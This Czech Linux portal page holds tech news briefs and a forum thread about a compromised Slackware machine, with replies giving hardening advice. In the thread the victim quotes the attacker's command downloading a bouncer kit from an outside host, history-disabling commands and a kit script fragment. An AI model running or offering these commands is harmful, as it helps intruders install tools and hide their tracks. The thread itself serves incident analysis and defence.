Wine bylo po roce vývoje od vydání verze 10.0 vydáno v nové stabilní verzi 11.0. Přehled novinek na GitLabu. Vypíchnuta je podpora NTSYNC a dokončení architektury WoW64.
Byl vydán Mozilla Firefox 147.0. Přehled novinek v poznámkách k vydání a poznámkách k vydání pro vývojáře. Firefox nově podporuje Freedesktop.org XDG Base Directory Specification. Řešeny jsou rovněž bezpečnostní chyby. Nový Firefox 147 bude brzy k dispozici také na Flathubu a Snapcraftu.
Asociace repair.org udělila anticeny těm nejhorším produktům představeným na veletrhu CES 2026. Oceněnými jsou například šmírující kamery Amazon Ring AI, chytrý běžecký pás od společnosti Merach, která otevřeně přiznává, že nedokáže zabezpečit osobní data uživatelů, případně jednorázové lízátko, které rozvibrovává čelisti uživatele a tak přehrává hudbu. Absolutním vítězem je lednička od Samsungu, která zobrazuje reklamy a kterou lze otevřít pouze hlasovým příkazem přes cloudovou službu.
Íránští protirežimní aktivisté si všímají 30% až 80% ztráty packetů při komunikaci se satelity služby Starlink. Mohlo by se jednat o vedlejší důsledek rušení GPS, kterou pozemní přijímače Starlinku používají k výpočtu polohy satelitů a kterou se režim rovněž snaží blokovat, podle bezpečnostního experta a iranisty Amira Rashidiho je ale pravděpodobnější příčinou terestrické rušení přímo satelitní komunikace Starlinku podobnou
… více »Evropská komise (EK) zvažuje, že zařadí komunikační službu WhatsApp americké společnosti Meta mezi velké internetové platformy, které podléhají přísnější regulaci podle unijního nařízení o digitálních službách (DSA). Firmy s více než 45 miliony uživatelů jsou podle DSA považovány za velmi velké on-line platformy (Very Large Online Platforms; VLOP) a podléhají přísnějším pravidlům EU pro internetový obsah. Pravidla po
… více »Tržní hodnota technologické společnosti Alphabet poprvé v historii přesáhla čtyři biliony dolarů (83 bilionů Kč). Stalo se tak poté, co Apple oznámil, že bude na poli umělé inteligence (AI) spolupracovat s dceřinou firmou Alphabetu, společností Google.
Nové číslo časopisu Raspberry Pi zdarma ke čtení: Raspberry Pi Official Magazine 161 (pdf).
Po delší době vývoje vyšla nativní linuxová verze virtuálního bubeníka MT-PowerDrumKit 2 ve formátu VST3. Mezi testovanými hosty jsou Reaper, Ardour, Bitwig a Carla.
Desktopové prostředí Budgie bylo vydáno ve verzi 10.10. Dokončena byla migrace z X11 na Wayland. Budgie 10 vstupuje do režimu údržby. Vývoj se přesouvá k Budgie 11. Dlouho se řešilo, v čem bude nové Budgie napsáno. Budgie 10 je postaveno nad GTK 3. Přemýšlelo se také nad přepsáním z GTK do EFL. Budgie 11 bude nakonec postaveno nad Qt 6.
OpenChaos.dev je 'samovolně se vyvíjející open source projekt' s nedefinovaným cílem. Každý týden mohou lidé hlasovat o návrzích (pull requestech), přičemž vítězný návrh se integruje do kódu projektu (repozitář na GitHubu). Hlasováním je možné změnit téměř vše, včetně tohoto pravidla. Hlasování končí vždy v neděli v 9:00 UTC.
Používám Slackware 10.0.
Jádro distribuční s jedinou drobnou úpravou.
Většina software pochází z distribučních balíčků, ale mám i nějaké kompilované ze zdrojových kódů a předkompilované z http://linuxpackages.net/.
Včera večer jsem pracoval na počítači a zůstal jsem připojený k internetu i přes to, že jsem nic nestahoval ani nikde nebrouzdal. Mám externí modem, a tak slyším každý přenos dat. Asi po hodině ticha najednou začal modem pracovat (typické skřípění, nebo šumění z reproduktoru modemu). Když jsem si toho po chvíli všiml, začal jsem pátrat po tom, co je tomu příčinou. Nejprve mě napadl poštovní klient, ale nebyl spuštěný. Spustil jsem tcpdump a odchytil nějaké spojení na adresu http://sigma.hostingfacile.net/. Dalším krokem bylo spuštění ps aux kde jsem ve výpisu našel přihlášeného uživatele mysql. Vzhledem k tomu, že počítač využívám sám a MySql jako službu mám vypnutou, byla pro mě návštěva uživatele mysql opravdovým překvapením. Při dalším výpisu ps aux už na mě "vybafl" uživatel mysql připojený hned několikrát. A co víc! Jeden z jeho procesů byl wget -c http://sufletl.home.ro/psy.tgz. A to byl právě ten okamžik, kdy jsem s velkou silou vytrhl kabel z modemu.
Po odpojení jsem chvíli přemýšlel a vydal jsem se na průzkum napáchaných škod. Nejprve do /etc/passwd, kde jsem objevil toto:
mysql:x:27:27:MySQL:/var/lib/mysql:/bin/bashMyslím, že by tam neměl být ten shell, ale jistý si nejsem.
Přihlásil jsem se jako uživatel mysql a hledal v domovském adresáři /var/lib/mysql soubor .bash_history, ale kromě mých databází tam nic nebylo. Že by něco takového?:
unset HISTFILE unset HISTSAVE history -n unset WATCH export HISTFILE=/dev/null
Smazal jsem uživatele mysql a připojil k internetu a za neustálého kontrolování přenosu jsem stáhl inkriminovaný soubor psy.tgz. Myslel jsem, kdovíco najdu, ale jde o celkem běžný soft. Trochu googlu a našel jsem tohle. Po přečtení reakcí jsem narazil na exploit, ale z toho nejsem dvakrát moudrý.
Taky jsem proběhl všechny tmp adresáře a ve /var/tmp/ jsme objevil adresář .bash, který odpovídá obsahu psy.tgz. Je s podivem, že tam byl celý když jsem viděl jak se stahuje... leda bych připojení ukončil těsně po stažení.
Otázky zní:
Jak získal útočník přístup do mého počítače?
Jak tomu napříště zabránit?
Jaké kroky podniknout?
Stala by se to, i kdybych použil pouze distribuční software - chyba v zabezpečení software třetích stran?
Co jsem zanedbal?
Jak jsou na tom jiné distribuce? Mandrake?
Co si o tom myslíte?
Jistě je pravdou, že správný administrátor systému by situaci neměl nechat dojít až do tohoto stavu a měl by ji předcházet. Především pravidelnou aktualizací a bezpečnostními záplatami. Stalo se.
Připojuji se teď k internetu s velkou opatrností, spouštím okamžitě tcpdump a neustále kontroluji spuštěné procesy. A to rozhodně není nic příjemného. Budu rád, podělíte-li se se mnou o své zkušenosti, nápady a rady.
mysql:x:27:27:MySQL:/var/lib/mysql:/bin/bash
ten zbytok je fakt divny
Tohle mi vrátil whois.enom.com:
Domain name: hostingfacile.net Registrant Contact: Eurologon S.r.l. Enzo Baiotto (domains@eurologon.com) +39.0119473512 Fax: +39 011 9409691 Via Roma 30 Trofarello, TO 10028 IT Administrative Contact: Eurologon S.r.l. Enzo Baiotto (hostmaster@eurologon.com) +39.0119473512 Fax: +39.0115503318 Via Roma 30 Trofarello, TO 10028 IT Billing Contact: Eurologon S.r.l. Enzo Baiotto (hostmaster@eurologon.com) +39.0119473512 Fax: +39.0115503318 Via Roma 30 Trofarello, TO 10028 IT Technical Contact: Eurologon S.r.l. Enzo Baiotto (hostmaster@eurologon.com) +39.0119473512 Fax: +39.0115503318 Via Roma 30 Trofarello, TO 10028 IT Status: Locked Name Servers: ns1.hostingfacile.net ns2.hostingfacile.net Creation date: 18 Apr 2002 16:38:18 Expiration date: 18 Apr 2006 16:38:18
ori.. bash export PATH="." httpd exit port-ul bouncerului este 50001 .. #HackTeam rullez...!No, spust si tam chkrootkit a rkhunter a uvidis sam...
Apache 1.3.31 [ Vulnerable ] PHP 4.3.7 [ Vulnerable ] Checking for allowed protocols... [ Warning (SSH v1 allowed) ]To jsem opravil...
Ano, používám jádro 2.4.x.
Stínová hesla - shadowing používám.
Iptables jsem nastavil takhle, snad to jako základ stačí:
iptables -P INPUT DROP iptables -P OUTPUT ACCEPT iptables -P FORWARD DROP iptables -A INPUT -i ! ppp+ -j ACCEPT iptables -A INPUT -m state --state ESTABLISHED,RELATED -j ACCEPT iptables -A INPUT -j LOG --log-prefix "INPUT drop: "Tripwire jsem naistaloval, ale něco je špatně:
Please enter your local passphrase: Parsing policy file: /etc/tripwire/tw.pol Generating the database... *** Processing Unix File System *** Software interrupt forced exit: Segmentation FaultVerze Tripwire:
Tripwire(R) 2.3.0.47 for LinuxNerozumím co znamená "povýšení práv".
SSH potřebuji. Jaký význam má zakázat přístup rootovi přes ssh, když se může přilásit běžný uživatel a použít su root? Přihlašování pomocí klíčů je možná příliš, bude stačit dostatečně silné heslo. Telnet zapnutý nemám.
Firewall jsem nastavil viz. výše. Nevím však, jestli je to dost paranoidně.
Přihlašování pomocí klíčů je možná příliš, bude stačit dostatečně silné heslo.Je to Vas nazor, nebudu Vam ho brat. Muzete ale zarucit, ze vsechny nezamcene ucty na tom pocitaci budou mit dostatecne silna hesla?
Jaký význam má zakázat přístup rootovi přes ssh, když se může přilásit běžný uživatel a použít su root?Da se nastavit, ze
su root muze pouzit pouze pokud ucet, ze ktereho tak cini, je ve skupine wheel. A treba ucet, pod kterym se utocnik prihlasi, ve wheel nebude.
Firewall jsem nastavil viz. výše. Nevím však, jestli je to dost paranoidně.Podle me ano (predpokladam, ze conntrack pouzivate, jinak RELATED tam je zbytecne). Jedna poznamka, lepsi nez:
iptables -A INPUT -i ! ppp+ -j ACCEPTje:
iptables -A INPUT -i lo -j ACCEPTProc povolovat pristup ze vsech rozhrani krome ppp, kdyz ve skutecnosti jedine co potrebujete je pristup z lo? I pokud tam mate eth rozhrani pripojene k siti, ktere duverujete, je vzdy lepsi to uvest explicitne nez povolovat pausalne.
Chyba byla nejspíš právě ve slabém hesle uživatele mysql a ta se mohla stát na kterékoliv distribuci. Rozhodně neinstaluji a nespouštím každou kravinu, právě naopak, snažím se minimalizovat instalovaný software.
Přestože problém nebyl zapříčiněn chybou, která mohla být zazáplatována, budu teď ale sledovat adresář patches pečlivěji. Po průniku do neopatchovného systému by měl rozhodně útočník jednodušší prácí např. s výběrem exploitu.
Jádra 2.4.x patří "bezpečnějším" vzhledem k jejich konzervativnímu přístupu k zařazování nových fičurek.
Zřejmě jsem se nechal příjemně ukolébat představou bezpečnosti a nevěnoval jsem ji takovou pozornost jakou by si zasloužila.
. S jadry je to plus minus, ale na 2.4 je mene chyb.
Patche je rozhodne zaklad sledovat, ne vzdy se musi opravovat jenom sploitovatelne veci pro ziskani roota, ale sem tam se muze resit i potencialni utok na vzdaleny pristup.
Nevadi, mas uz alespon pouceni pro priste. Klice zase nejsou tak paranoidni jak se zdaji naopak je to dobra vec. Jinak opravdu to chce premyslet a domyslet do vsech detailu co se muze stat a co vsechno priskrtit abys co nejvice snizil moznost pruniku. S tim hodne stesti.
Tiskni
Sdílej: